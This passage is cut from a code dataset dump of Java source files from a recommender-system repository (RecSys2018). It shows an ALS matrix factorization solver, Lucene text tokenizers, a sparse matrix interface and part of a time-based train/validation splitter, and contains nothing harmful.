true;\n\t\tpublic int printFrequency = 500_000;\n\n\t\t@Override\n\t\tpublic String toString() {\n\t\t\tStringBuilder result = new StringBuilder();\n\t\t\tString newLine = System.getProperty(\"line.separator\");\n\n\t\t\tresult.append(this.getClass().getName());\n\t\t\tresult.append(\" {\");\n\t\t\tresult.append(newLine);\n\n\t\t\t// determine fields declared in this class only (no fields of\n\t\t\t// superclass)\n\t\t\tField[] fields 
= this.getClass().getDeclaredFields();\n\n\t\t\t// print field names paired with their values\n\t\t\tfor (Field field : fields) {\n\t\t\t\tresult.append(\" \");\n\t\t\t\ttry {\n\t\t\t\t\tresult.append(field.getName());\n\t\t\t\t\tresult.append(\": \");\n\t\t\t\t\t// requires access to private field:\n\t\t\t\t\tresult.append(field.get(this));\n\t\t\t\t} catch (IllegalAccessException ex) {\n\t\t\t\t\tSystem.out.println(ex);\n\t\t\t\t}\n\t\t\t\tresult.append(newLine);\n\t\t\t}\n\t\t\tresult.append(\"}\");\n\n\t\t\treturn result.toString();\n\t\t}\n\n\t}\n\n\tprivate ALSParams params;\n\tprivate MLDenseMatrix U;\n\tprivate MLDenseMatrix V;\n\tprivate MLTimer timer;\n\n\tpublic ALS(final ALSParams paramsP) {\n\t\tthis.params = paramsP;\n\t\tthis.timer = new MLTimer(\"als\", this.params.maxIter);\n\t}\n\n\tpublic MLDenseMatrix getU() {\n\t\treturn this.U;\n\t}\n\n\tpublic MLDenseMatrix getV() {\n\t\treturn this.V;\n\t}\n\n\tpublic void optimize(final MLSparseMatrix R_train, final String outPath)\n\t\t\tthrows Exception {\n\n\t\tthis.timer.tic();\n\n\t\tMLSparseMatrix R_train_t = R_train.transpose();\n\t\tthis.timer.toc(\"obtained R Rt\");\n\n\t\t// randomly initialize U and V\n\t\tif (this.U == null) {\n\t\t\tthis.U = MLDenseMatrix.initRandom(R_train.getNRows(),\n\t\t\t\t\tthis.params.rank, this.params.init, this.params.seed);\n\t\t\tthis.timer.toc(\"initialized U\");\n\t\t}\n\n\t\tif (this.V == null) {\n\t\t\tthis.V = MLDenseMatrix.initRandom(R_train.getNCols(),\n\t\t\t\t\tthis.params.rank, this.params.init, this.params.seed);\n\t\t\tthis.timer.toc(\"initialized V\");\n\t\t}\n\n\t\tfor (int i = 0; i < R_train.getNRows(); i++) {\n\t\t\tif (R_train.getRow(i) == null) {\n\t\t\t\t// zero out cold start users\n\t\t\t\tthis.U.setRow(new MLDenseVector(new float[this.params.rank]),\n\t\t\t\t\t\ti);\n\t\t\t}\n\t\t}\n\t\tfor (int i = 0; i < R_train_t.getNRows(); i++) {\n\t\t\tif (R_train_t.getRow(i) == null) {\n\t\t\t\t// zero out cold start items\n\t\t\t\tthis.V.setRow(new 
MLDenseVector(new float[this.params.rank]),\n\t\t\t\t\t\ti);\n\t\t\t}\n\t\t}\n\n\t\tfor (int iter = 0; iter < this.params.maxIter; iter++) {\n\t\t\tthis.solve(R_train, this.U, this.V);\n\t\t\tthis.solve(R_train_t, this.V, this.U);\n\t\t\tthis.timer.toc(\"solver done\");\n\t\t\tthis.timer.toc(String.format(\"[iter %d] done\", iter));\n\t\t}\n\n\t\tif (outPath != null) {\n\t\t\tString uOutFile = outPath + \"U_\" + this.params.rank + \".bin\";\n\t\t\tString vOutFile = outPath + \"V_\" + this.params.rank + \".bin\";\n\n\t\t\tthis.U.toFile(uOutFile);\n\t\t\tthis.timer.toc(\"written U to \" + uOutFile);\n\n\t\t\tthis.V.toFile(vOutFile);\n\t\t\tthis.timer.toc(\"written V to \" + vOutFile);\n\t\t}\n\t}\n\n\tpublic void setU(final MLDenseMatrix Up) {\n\t\tthis.U = Up;\n\t}\n\n\tpublic void setV(final MLDenseMatrix Vp) {\n\t\tthis.V = Vp;\n\t}\n\n\tprivate MLDenseVector solve(final int targetIndex,\n\t\t\tfinal MLSparseMatrix data, final float[] H, final float[] HH,\n\t\t\tfinal float[] cache) {\n\t\tint[] rowIndexes = data.getRow(targetIndex).getIndexes();\n\t\tfloat[] values = data.getRow(targetIndex).getValues();\n\n\t\tfloat[] HC_minus_IH = new float[this.params.rank * this.params.rank];\n\t\tfor (int i = 0; i < this.params.rank; i++) {\n\t\t\tfor (int j = i; j < this.params.rank; j++) {\n\t\t\t\tfloat total = 0;\n\t\t\t\tfor (int k = 0; k < rowIndexes.length; k++) {\n\t\t\t\t\tint offset = rowIndexes[k] * this.params.rank;\n\t\t\t\t\ttotal += H[offset + i] * H[offset + j] * values[k];\n\t\t\t\t}\n\t\t\t\tHC_minus_IH[i * this.params.rank + j] = total\n\t\t\t\t\t\t* this.params.alpha;\n\t\t\t\tHC_minus_IH[j * this.params.rank + i] = total\n\t\t\t\t\t\t* this.params.alpha;\n\t\t\t}\n\t\t}\n\t\t// create HCp in O(f|S_u|)\n\t\tfloat[] HCp = new float[this.params.rank];\n\t\tfor (int i = 0; i < this.params.rank; i++) {\n\t\t\tfloat total = 0;\n\t\t\tfor (int k = 0; k < rowIndexes.length; k++) {\n\t\t\t\ttotal += H[rowIndexes[k] * this.params.rank + i]\n\t\t\t\t\t\t* (1 + 
this.params.alpha * values[k]);\n\t\t\t}\n\t\t\tHCp[i] = total;\n\t\t}\n\t\t// create temp = HH + HC_minus_IH + lambda*I\n\t\t// temp is symmetric\n\t\t// the inverse temp is symmetric\n\t\tfloat[] temp = new float[this.params.rank * this.params.rank];\n\t\tfor (int i = 0; i < this.params.rank; i++) {\n\t\t\tfinal int offset = i * this.params.rank;\n\t\t\tfor (int j = i; j < this.params.rank; j++) {\n\t\t\t\tfloat total = HH[offset + j] + HC_minus_IH[offset + j];\n\t\t\t\tif (i == j) {\n\t\t\t\t\ttotal += this.params.lambda;\n\t\t\t\t}\n\t\t\t\ttemp[offset + j] = total;\n\t\t\t}\n\t\t}\n\n\t\tLowLevelRoutines.symmetricSolve(temp, this.params.rank, HCp, cache);\n\n\t\t// return optimal solution\n\t\treturn new MLDenseVector(HCp);\n\t}\n\n\tprivate MLDenseVector solve(final int targetIndex,\n\t\t\tfinal MLSparseMatrix data, final MLDenseMatrix H, final float[] HH,\n\t\t\tfinal float[] cache) {\n\t\tint[] rowIndexes = data.getRow(targetIndex).getIndexes();\n\t\tfloat[] values = data.getRow(targetIndex).getValues();\n\n\t\tfloat[] HC_minus_IH = new float[this.params.rank * this.params.rank];\n\t\tfor (int i = 0; i < this.params.rank; i++) {\n\t\t\tfor (int j = i; j < this.params.rank; j++) {\n\t\t\t\tfloat total = 0;\n\t\t\t\tfor (int k = 0; k < rowIndexes.length; k++) {\n\t\t\t\t\ttotal += H.getValue(rowIndexes[k], i)\n\t\t\t\t\t\t\t* H.getValue(rowIndexes[k], j) * values[k];\n\t\t\t\t}\n\t\t\t\tHC_minus_IH[i * this.params.rank + j] = total\n\t\t\t\t\t\t* this.params.alpha;\n\t\t\t\tHC_minus_IH[j * this.params.rank + i] = total\n\t\t\t\t\t\t* this.params.alpha;\n\t\t\t}\n\t\t}\n\t\t// create HCp in O(f|S_u|)\n\t\tfloat[] HCp = new float[this.params.rank];\n\t\tfor (int i = 0; i < this.params.rank; i++) {\n\t\t\tfloat total = 0;\n\t\t\tfor (int k = 0; k < rowIndexes.length; k++) {\n\t\t\t\ttotal += H.getValue(rowIndexes[k], i)\n\t\t\t\t\t\t* (1 + this.params.alpha * values[k]);\n\t\t\t}\n\t\t\tHCp[i] = total;\n\t\t}\n\t\t// create temp = HH + HC_minus_IH + 
lambda*I\n\t\t// temp is symmetric\n\t\t// the inverse temp is symmetric\n\t\tfloat[] temp = new float[this.params.rank * this.params.rank];\n\t\tfor (int i = 0; i < this.params.rank; i++) {\n\t\t\tfinal int offset = i * this.params.rank;\n\t\t\tfor (int j = i; j < this.params.rank; j++) {\n\t\t\t\tfloat total = HH[offset + j] + HC_minus_IH[offset + j];\n\t\t\t\tif (i == j) {\n\t\t\t\t\ttotal += this.params.lambda;\n\t\t\t\t}\n\t\t\t\ttemp[offset + j] = total;\n\t\t\t}\n\t\t}\n\n\t\tLowLevelRoutines.symmetricSolve(temp, this.params.rank, HCp, cache);\n\n\t\t// return optimal solution\n\t\treturn new MLDenseVector(Arrays.copyOf(HCp, this.params.rank));\n\t}\n\n\tprivate void solve(final MLSparseMatrix data, final MLDenseMatrix W,\n\t\t\tfinal MLDenseMatrix H) {\n\n\t\tint cacheSize = LowLevelRoutines.symmInverseCacheSize(\n\t\t\t\tnew float[this.params.rank * this.params.rank],\n\t\t\t\tthis.params.rank);\n\t\t// float[] cache = new float[cacheSize];\n\t\tMLConcurrentUtils.Async<float[]> cache = new MLConcurrentUtils.Async<>(\n\t\t\t\t() -> new float[cacheSize], null);\n\t\tMLTimer timer = new MLTimer(\"als\", data.getNRows());\n\t\ttimer.tic();\n\n\t\t// compute H_t * H\n\t\tMLDenseMatrix HH = H.transposeMultNative();\n\t\tfloat[] HHflat = HH.toFlatArray();\n\t\tif (this.params.debug) {\n\t\t\ttimer.toc(\"HH done\");\n\t\t}\n\n\t\tboolean[] useFlat = new boolean[] { false };\n\t\tfloat[][] Hflat = new float[1][];\n\t\tif (H.getNRows() < LowLevelRoutines.MAX_ARRAY_SIZE / H.getNCols()) {\n\t\t\t// no overflow so use flat version\n\t\t\tuseFlat[0] = true;\n\t\t\tHflat[0] = H.toFlatArray();\n\t\t\tif (this.params.debug) {\n\t\t\t\ttimer.toc(\"H to flat done\");\n\t\t\t}\n\t\t} else {\n\t\t\tSystem.out.println(\"WARNING: not using flat H\");\n\t\t}\n\n\t\tint[] rowIndices = new int[data.getNRows()];\n\t\tfor (int i = 0; i < data.getNRows(); i++) {\n\t\t\trowIndices[i] = i;\n\t\t}\n\t\tMLRandomUtils.shuffle(rowIndices, new Random(1));\n\t\tAtomicInteger counter = new 
AtomicInteger(0);\n\t\tIntStream.range(0, rowIndices.length).parallel().forEach(i -> {\n\t\t\tint count = counter.incrementAndGet();\n\t\t\tif (this.params.debug && count % this.params.printFrequency == 0) {\n\t\t\t\ttimer.tocLoop(count);\n\t\t\t}\n\t\t\tint rowIndex = rowIndices[i];\n\t\t\tif (data.getRow(rowIndex) == null) {\n\t\t\t\treturn;\n\t\t\t}\n\n\t\t\tMLDenseVector solution;\n\t\t\tif (useFlat[0] == true) {\n\t\t\t\tsolution = solve(rowIndex, data, Hflat[0], HHflat, cache.get());\n\t\t\t} else {\n\t\t\t\tsolution = solve(rowIndex, data, H, HHflat, cache.get());\n\t\t\t}\n\n\t\t\tW.setRow(solution, rowIndex);\n\t\t});\n\t\tif (this.params.debug) {\n\t\t\ttimer.tocLoop(counter.get());\n\t\t}\n\t}\n\n\tpublic static void main(String[] args) {\n\t\tMLDenseMatrix V = new MLDenseMatrix(\n\t\t\t\tnew MLDenseVector[] { new MLDenseVector(new float[] { 1, 2 }),\n\t\t\t\t\t\tnew MLDenseVector(new float[] { 3, 4 }),\n\t\t\t\t\t\tnew MLDenseVector(new float[] { 5, 6 }) });\n\t\tMLDenseMatrix U = new MLDenseMatrix(\n\t\t\t\tnew MLDenseVector[] { new MLDenseVector(new float[] { 1, -2 }),\n\t\t\t\t\t\tnew MLDenseVector(new float[] { 3, -4 }),\n\t\t\t\t\t\tnew MLDenseVector(new float[] { 5, -6 }) });\n\n\t\tMLSparseVector[] test = new MLSparseVector[3];\n\t\ttest[0] = new MLSparseVector(new int[] { 0, 1 }, new float[] { 1, 1 },\n\t\t\t\tnull, 3);\n\t\ttest[1] = new MLSparseVector(new int[] { 0, 1, 2 },\n\t\t\t\tnew float[] { 1, 1, 1 }, null, 3);\n\t\ttest[2] = new MLSparseVector(new int[] { 1, 2 }, new float[] { 1, 1 },\n\t\t\t\tnull, 3);\n\t\tMLSparseMatrix R = new MLSparseMatrixAOO(test, 3);\n\t\tMLSparseMatrix RT = new MLSparseMatrixAOO(test, 3);\n\n\t\tALSParams params = new ALSParams();\n\t\tparams.maxIter = 1;\n\t\tparams.rank = 2;\n\t\tparams.lambda = 0f;\n\n\t\tALS als = new ALS(params);\n\t\tals.solve(R, U, V);\n\t\tals.solve(RT, V, 
U);\n\n\t\tSystem.out.println(\"U\");\n\t\tSystem.out.println(Arrays.toString(U.getRow(0).getValues()));\n\t\tSystem.out.println(Arrays.toString(U.getRow(1).getValues()));\n\t\tSystem.out.println(Arrays.toString(U.getRow(2).getValues()));\n\t\tSystem.out.println(\"\\nV\");\n\t\tSystem.out.println(Arrays.toString(V.getRow(0).getValues()));\n\t\tSystem.out.println(Arrays.toString(V.getRow(1).getValues()));\n\t\tSystem.out.println(Arrays.toString(V.getRow(2).getValues()));\n\t}\n}\n" }, { "alpha_fraction": 0.7043249607086182, "alphanum_fraction": 0.7227162718772888, "avg_line_length": 26.186813354492188, "blob_id": "d65902a479095f7390eebe3201ea37a33b2057cd", "content_id": "8c317cdbfb4afbd69f48fe96fe3fd8c02a48c725", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 4948, "license_type": "permissive", "max_line_length": 113, "num_lines": 182, "path": "/src/main/java/common/MLTextTransform.java", "repo_name": "internetmusic/RecSys2018", "src_encoding": "UTF-8", "text": "package common;\n\nimport java.io.IOException;\nimport java.io.Serializable;\nimport java.io.StringReader;\nimport java.util.HashMap;\nimport java.util.LinkedList;\nimport java.util.List;\nimport java.util.Map;\n\nimport org.apache.lucene.analysis.Analyzer;\nimport org.apache.lucene.analysis.LowerCaseFilter;\nimport org.apache.lucene.analysis.TokenStream;\nimport org.apache.lucene.analysis.Tokenizer;\nimport org.apache.lucene.analysis.core.WhitespaceTokenizer;\nimport org.apache.lucene.analysis.miscellaneous.ASCIIFoldingFilter;\nimport org.apache.lucene.analysis.tokenattributes.CharTermAttribute;\nimport org.apache.lucene.analysis.miscellaneous.WordDelimiterGraphFilterFactory;\nimport org.apache.lucene.analysis.ngram.NGramTokenFilter;\n\npublic abstract class MLTextTransform implements Serializable {\n\n\tpublic static class DefaultAnalyzer extends Analyzer\n\t\t\timplements Serializable {\n\t\tprivate static final long serialVersionUID = 
8662472589510750438L;\n\n\t\t@Override\n\t\tprotected TokenStreamComponents createComponents(\n\t\t\t\tfinal String fieldName) {\n\t\t\ttry {\n\t\t\t\tTokenizer tokenizer = new WhitespaceTokenizer();\n\n\t\t\t\tMap<String, String> args = new HashMap<String, String>();\n\t\t\t\targs.put(\"catenateAll\", \"0\");\n\t\t\t\targs.put(\"generateNumberParts\", \"1\");\n\t\t\t\targs.put(\"generateWordParts\", \"1\");\n\t\t\t\targs.put(\"splitOnCaseChange\", \"1\");\n\t\t\t\targs.put(\"splitOnNumerics\", \"1\");\n\n\t\t\t\tWordDelimiterGraphFilterFactory factory = new WordDelimiterGraphFilterFactory(\n\t\t\t\t\t\targs);\n\t\t\t\tTokenStream filter = factory.create(tokenizer);\n\n\t\t\t\tfilter = new LowerCaseFilter(filter);\n\n\t\t\t\tfilter = new ASCIIFoldingFilter(filter);\n\n\t\t\t\treturn new TokenStreamComponents(tokenizer, filter);\n\n\t\t\t} catch (Exception e) {\n\t\t\t\te.printStackTrace();\n\t\t\t}\n\t\t\treturn null;\n\t\t}\n\t}\n\n\tpublic static class DefaultNGRAMAnalyzer extends Analyzer\n\t\t\timplements Serializable {\n\n\t\tprivate static final long serialVersionUID = 2224016723762685329L;\n\t\t// https://lucene.apache.org/core/7_0_0/analyzers-common/org/apache/lucene/analysis/ngram/NGramTokenFilter.html\n\t\tprivate int minGram;\n\t\tprivate int maxGram;\n\n\t\tpublic DefaultNGRAMAnalyzer(final int minGraP, final int maxGramP) {\n\t\t\tthis.minGram = minGraP;\n\t\t\tthis.maxGram = maxGramP;\n\t\t}\n\n\t\t@Override\n\t\tprotected TokenStreamComponents createComponents(\n\t\t\t\tfinal String fieldName) {\n\t\t\ttry {\n\t\t\t\tTokenizer tokenizer = new WhitespaceTokenizer();\n\n\t\t\t\tMap<String, String> args = new HashMap<String, String>();\n\t\t\t\targs.put(\"catenateAll\", \"0\");\n\t\t\t\targs.put(\"generateNumberParts\", \"1\");\n\t\t\t\targs.put(\"generateWordParts\", \"1\");\n\t\t\t\targs.put(\"splitOnCaseChange\", \"1\");\n\t\t\t\targs.put(\"splitOnNumerics\", \"1\");\n\n\t\t\t\tWordDelimiterGraphFilterFactory factory = new 
WordDelimiterGraphFilterFactory(\n\t\t\t\t\t\targs);\n\t\t\t\tTokenStream filter = factory.create(tokenizer);\n\n\t\t\t\tfilter = new LowerCaseFilter(filter);\n\n\t\t\t\tfilter = new ASCIIFoldingFilter(filter);\n\n\t\t\t\tfilter = new NGramTokenFilter(filter, this.minGram,\n\t\t\t\t\t\tthis.maxGram);\n\n\t\t\t\treturn new TokenStreamComponents(tokenizer, filter);\n\n\t\t\t} catch (Exception e) {\n\t\t\t\te.printStackTrace();\n\t\t\t}\n\t\t\treturn null;\n\t\t}\n\t}\n\n\tpublic static class LuceneAnalyzerTextTransform extends MLTextTransform {\n\n\t\tprivate static final long serialVersionUID = 1843607513745972795L;\n\t\tprivate Analyzer analyzer;\n\n\t\tpublic LuceneAnalyzerTextTransform(final Analyzer analyzerP) {\n\t\t\tthis.analyzer = analyzerP;\n\t\t}\n\n\t\t@Override\n\t\tpublic void apply(final MLTextInput input) {\n\t\t\ttry {\n\t\t\t\tList<String> tokens = passThroughAnalyzer(input.text,\n\t\t\t\t\t\tthis.analyzer);\n\t\t\t\tString[] tokenized = new String[tokens.size()];\n\t\t\t\tint cur = 0;\n\t\t\t\tfor (String token : tokens) {\n\t\t\t\t\ttokenized[cur] = token;\n\t\t\t\t\tcur++;\n\t\t\t\t}\n\t\t\t\tinput.setTokenized(tokenized);\n\n\t\t\t} catch (Exception e) {\n\t\t\t\tthrow new RuntimeException(e.getMessage());\n\t\t\t}\n\t\t}\n\n\t\tpublic static List<String> passThroughAnalyzer(final String input,\n\t\t\t\tfinal Analyzer analyzer) throws IOException {\n\t\t\tTokenStream tokenStream = null;\n\t\t\ttry {\n\t\t\t\ttokenStream = analyzer.tokenStream(null,\n\t\t\t\t\t\tnew StringReader(input));\n\t\t\t\tCharTermAttribute termAtt = tokenStream\n\t\t\t\t\t\t.addAttribute(CharTermAttribute.class);\n\t\t\t\ttokenStream.reset();\n\t\t\t\tList<String> tokens = new LinkedList<String>();\n\t\t\t\twhile (tokenStream.incrementToken()) {\n\t\t\t\t\tString term = termAtt.toString().trim();\n\t\t\t\t\tif (term.length() > 0) {\n\t\t\t\t\t\ttokens.add(term);\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\ttokenStream.end();\n\n\t\t\t\treturn tokens;\n\t\t\t} finally {\n\t\t\t\tif 
(tokenStream != null) {\n\t\t\t\t\ttokenStream.close();\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\tpublic static class MLTextInput {\n\n\t\tprivate String text;\n\t\tprivate String[] tokenized;\n\n\t\tpublic MLTextInput(final String textP) {\n\t\t\tthis.text = textP;\n\t\t}\n\n\t\tpublic String getText() {\n\t\t\treturn this.text;\n\t\t}\n\n\t\tpublic String[] getTokenized() {\n\t\t\treturn this.tokenized;\n\t\t}\n\n\t\tpublic void setTokenized(final String[] tokenizedP) {\n\t\t\tthis.tokenized = tokenizedP;\n\t\t}\n\t}\n\n\tprivate static final long serialVersionUID = 3800020927323228525L;\n\n\tpublic abstract void apply(final MLTextInput input);\n}\n" }, { "alpha_fraction": 0.7008466720581055, "alphanum_fraction": 0.7043744325637817, "avg_line_length": 25.742137908935547, "blob_id": "436140951e53696fef76bfa776c81d903c6917fd", "content_id": "d942d25cde948c254fcbf1e259bf728726f37f66", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 4252, "license_type": "permissive", "max_line_length": 75, "num_lines": 159, "path": "/src/main/java/common/MLSparseMatrix.java", "repo_name": "internetmusic/RecSys2018", "src_encoding": "UTF-8", "text": "package common;\n\nimport java.io.Serializable;\nimport java.util.Arrays;\nimport java.util.Map;\nimport java.util.stream.IntStream;\n\npublic interface MLSparseMatrix extends Serializable {\n\n\tpublic abstract void applyColNorm(final MLDenseVector colNorm);\n\n\tpublic abstract void applyColSelector(\n\t\t\tfinal Map<Integer, Integer> selectedColMap,\n\t\t\tfinal int nColsSelected);\n\n\tpublic abstract void applyRowNorm(final MLDenseVector rowNorm);\n\n\tpublic abstract void binarizeValues();\n\n\tpublic abstract MLSparseMatrix deepCopy();\n\n\tpublic abstract MLDenseVector getColNNZ();\n\n\tpublic abstract MLDenseVector getColNorm(final int p);\n\n\tpublic abstract MLDenseVector getColSum();\n\n\tpublic abstract int getNCols();\n\n\tpublic abstract long 
getNNZ();\n\n\tpublic abstract int getNRows();\n\n\tpublic abstract MLSparseVector getRow(final int rowIndex);\n\n\tpublic abstract MLSparseVector getRow(final int rowIndex,\n\t\t\tfinal boolean returnEmpty);\n\n\tpublic abstract MLDenseVector getRowNNZ();\n\n\tpublic abstract MLDenseVector getRowNorm(final int p);\n\n\tpublic abstract MLDenseVector getRowSum();\n\n\tpublic abstract boolean hasDates();\n\n\tpublic abstract void inferAndSetNCols();\n\n\tpublic abstract MLSparseMatrix mult(final MLSparseMatrix another);\n\n\tpublic abstract MLDenseVector multCol(final MLDenseVector vector);\n\n\tpublic abstract MLDenseVector multCol(final MLSparseVector vector);\n\n\tpublic abstract MLDenseVector multRow(final MLDenseVector vector);\n\n\tpublic abstract MLDenseVector multRow(final MLSparseVector vector);\n\n\tpublic abstract Map<Integer, Integer> selectCols(final int nnzCutOff);\n\n\tpublic abstract void setNCols(int nCols);\n\n\tpublic abstract void setRow(final MLSparseVector row, final int rowIndex);\n\n\tpublic abstract void toBinFile(final String outFile) throws Exception;\n\n\tpublic abstract MLSparseMatrix transpose();\n\n\tpublic static MLSparseMatrix concatHorizontal(\n\t\t\tfinal MLSparseMatrix... 
matrices) {\n\t\tint nRows = matrices[0].getNRows();\n\t\tint nColsNew = 0;\n\t\tfor (MLSparseMatrix matrix : matrices) {\n\t\t\tif (nRows != matrix.getNRows()) {\n\t\t\t\tthrow new IllegalArgumentException(\n\t\t\t\t\t\t\"input must have same number of rows\");\n\t\t\t}\n\n\t\t\tnColsNew += matrix.getNCols();\n\t\t}\n\n\t\tMLSparseVector[] concat = new MLSparseVector[nRows];\n\t\tIntStream.range(0, nRows).parallel().forEach(rowIndex -> {\n\n\t\t\tMLSparseVector[] rows = new MLSparseVector[matrices.length];\n\t\t\tboolean allNull = true;\n\t\t\tfor (int i = 0; i < matrices.length; i++) {\n\t\t\t\tMLSparseVector row = matrices[i].getRow(rowIndex);\n\t\t\t\tif (row != null) {\n\t\t\t\t\tallNull = false;\n\t\t\t\t} else {\n\t\t\t\t\t// nulls are not allowed in vector concat\n\t\t\t\t\trow = new MLSparseVector(null, null, null,\n\t\t\t\t\t\t\tmatrices[i].getNCols());\n\t\t\t\t}\n\t\t\t\trows[i] = row;\n\t\t\t}\n\t\t\tif (allNull == true) {\n\t\t\t\tconcat[rowIndex] = null;\n\t\t\t} else {\n\t\t\t\tconcat[rowIndex] = MLSparseVector.concat(rows);\n\t\t\t}\n\t\t});\n\n\t\treturn new MLSparseMatrixAOO(concat, nColsNew);\n\t}\n\n\tpublic static MLSparseMatrix concatVertical(\n\t\t\tfinal MLSparseMatrix... 
matrices) {\n\n\t\tint nCols = matrices[0].getNCols();\n\t\tint nRowsNew = 0;\n\t\tint[] offsets = new int[matrices.length];\n\t\tboolean[] hasDates = new boolean[] { true };\n\t\tfor (int i = 0; i < offsets.length; i++) {\n\t\t\tif (nCols != matrices[i].getNCols()) {\n\t\t\t\tthrow new IllegalArgumentException(\n\t\t\t\t\t\t\"input must have same number of columns\");\n\t\t\t}\n\t\t\tnRowsNew += matrices[i].getNRows();\n\t\t\toffsets[i] = nRowsNew;\n\n\t\t\tif (matrices[i].hasDates() == false) {\n\t\t\t\thasDates[0] = false;\n\t\t\t}\n\t\t}\n\n\t\tMLSparseVector[] concatRows = new MLSparseVector[nRowsNew];\n\t\tIntStream.range(0, nRowsNew).parallel().forEach(rowIndex -> {\n\n\t\t\tint offsetMatIndex = 0;\n\t\t\tint offsetRowIndex = 0;\n\t\t\tfor (int i = 0; i < offsets.length; i++) {\n\t\t\t\tif (rowIndex < offsets[i]) {\n\t\t\t\t\toffsetMatIndex = i;\n\t\t\t\t\tif (i == 0) {\n\t\t\t\t\t\toffsetRowIndex = rowIndex;\n\t\t\t\t\t} else {\n\t\t\t\t\t\toffsetRowIndex = rowIndex - offsets[i - 1];\n\t\t\t\t\t}\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tMLSparseVector row = matrices[offsetMatIndex]\n\t\t\t\t\t.getRow(offsetRowIndex);\n\t\t\tif (row != null) {\n\t\t\t\tconcatRows[rowIndex] = row.deepCopy();\n\t\t\t\tif (hasDates[0] == false) {\n\t\t\t\t\t// NOTE: if at least one matrix doesn't have dates\n\t\t\t\t\t// then all dates must be removed\n\t\t\t\t\tconcatRows[rowIndex].setDates(null);\n\t\t\t\t}\n\t\t\t}\n\t\t});\n\n\t\treturn new MLSparseMatrixAOO(concatRows, nCols);\n\t}\n}\n" }, { "alpha_fraction": 0.6531432271003723, "alphanum_fraction": 0.6571608781814575, "avg_line_length": 28.11467933654785, "blob_id": "be29b88abd8f72fad8ba4695dd0857fe49b325c8", "content_id": "f131e34dad4adfcaf4e17d1b57e9cfb4d9ba3996", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 12694, "license_type": "permissive", "max_line_length": 70, "num_lines": 436, "path": "/src/main/java/common/SplitterCF.java", 
"repo_name": "internetmusic/RecSys2018", "src_encoding": "UTF-8", "text": "package common;\n\nimport java.io.Serializable;\nimport java.util.ArrayList;\nimport java.util.Arrays;\nimport java.util.Collections;\nimport java.util.HashMap;\nimport java.util.HashSet;\nimport java.util.List;\nimport java.util.Map;\nimport java.util.Random;\nimport java.util.Set;\nimport java.util.concurrent.atomic.AtomicInteger;\nimport java.util.stream.IntStream;\n\npublic class SplitterCF implements Serializable {\n\n\tprivate static final long serialVersionUID = -3182298371988867241L;\n\tprivate Map<String, MLSparseMatrix> Rstrain;\n\tprivate Map<String, MLSparseMatrix> Rsvalid;\n\tprivate int[] validRowIndexes;\n\tprivate int[] validColIndexes;\n\n\tpublic SplitterCF() {\n\n\t}\n\n\tpublic Map<String, MLSparseMatrix> getRstrain() {\n\t\treturn Rstrain;\n\t}\n\n\tpublic Map<String, MLSparseMatrix> getRsvalid() {\n\t\treturn Rsvalid;\n\t}\n\n\tpublic int[] getValidColIndexes() {\n\t\treturn validColIndexes;\n\t}\n\n\tpublic int[] getValidRowIndexes() {\n\t\treturn validRowIndexes;\n\t}\n\n\tpublic void setRstrain(Map<String, MLSparseMatrix> rstrain) {\n\t\tthis.Rstrain = rstrain;\n\t}\n\n\tpublic void setRsvalid(Map<String, MLSparseMatrix> rsvalid) {\n\t\tthis.Rsvalid = rsvalid;\n\t}\n\n\tpublic void setValidColIndexes(int[] validColIndexes) {\n\t\tthis.validColIndexes = validColIndexes;\n\t}\n\n\tpublic void setValidRowIndexes(int[] validRowIndexes) {\n\t\tthis.validRowIndexes = validRowIndexes;\n\t}\n\n\tprivate void split(final Map<String, MLSparseMatrix> Rs,\n\t\t\tfinal long dateCutOff) {\n\t\tthis.Rstrain = new HashMap<String, MLSparseMatrix>();\n\t\tthis.Rsvalid = new HashMap<String, MLSparseMatrix>();\n\n\t\tfor (Map.Entry<String, MLSparseMatrix> entry : Rs.entrySet()) {\n\t\t\tMLSparseMatrix R = entry.getValue();\n\n\t\t\tMLSparseVector[] trainRows = new MLSparseVector[R.getNRows()];\n\t\t\tMLSparseVector[] validRows = new MLSparseVector[R.getNRows()];\n\n\t\t\tAtomicInteger 
nnzTrain = new AtomicInteger(0);\n\t\t\tAtomicInteger nnzValid = new AtomicInteger(0);\n\t\t\tIntStream.range(0, R.getNRows()).parallel().forEach(rowIndex -> {\n\t\t\t\tMLSparseVector row = R.getRow(rowIndex);\n\t\t\t\tif (row == null) {\n\t\t\t\t\treturn;\n\t\t\t\t}\n\t\t\t\tlong[] dates = row.getDates();\n\n\t\t\t\tint nGreater = 0;\n\t\t\t\tfor (int i = 0; i < dates.length; i++) {\n\t\t\t\t\tif (dates[i] > dateCutOff) {\n\t\t\t\t\t\tnGreater++;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\tif (nGreater == dates.length) {\n\t\t\t\t\t// no training data\n\t\t\t\t\treturn;\n\t\t\t\t}\n\n\t\t\t\t// split forward in time\n\t\t\t\tint jtrain = 0;\n\t\t\t\tint[] indexesTrain = new int[dates.length - nGreater];\n\t\t\t\tfloat[] valuesTrain = new float[dates.length - nGreater];\n\t\t\t\tlong[] datesTrain = new long[dates.length - nGreater];\n\n\t\t\t\tint jvalid = 0;\n\t\t\t\tint[] indexesValid = new int[nGreater];\n\t\t\t\tfloat[] valuesValid = new float[nGreater];\n\t\t\t\tlong[] datesValid = new long[nGreater];\n\n\t\t\t\tint[] indexes = row.getIndexes();\n\t\t\t\tfloat[] values = row.getValues();\n\t\t\t\tfor (int j = 0; j < dates.length; j++) {\n\t\t\t\t\tif (dates[j] > dateCutOff) {\n\t\t\t\t\t\t// interactions after dateCutOff\n\t\t\t\t\t\tindexesValid[jvalid] = indexes[j];\n\t\t\t\t\t\tvaluesValid[jvalid] = values[j];\n\t\t\t\t\t\tdatesValid[jvalid] = dates[j];\n\t\t\t\t\t\tjvalid++;\n\n\t\t\t\t\t} else {\n\t\t\t\t\t\t// interactions before dateCutOff\n\t\t\t\t\t\tindexesTrain[jtrain] = indexes[j];\n\t\t\t\t\t\tvaluesTrain[jtrain] = values[j];\n\t\t\t\t\t\tdatesTrain[jtrain] = 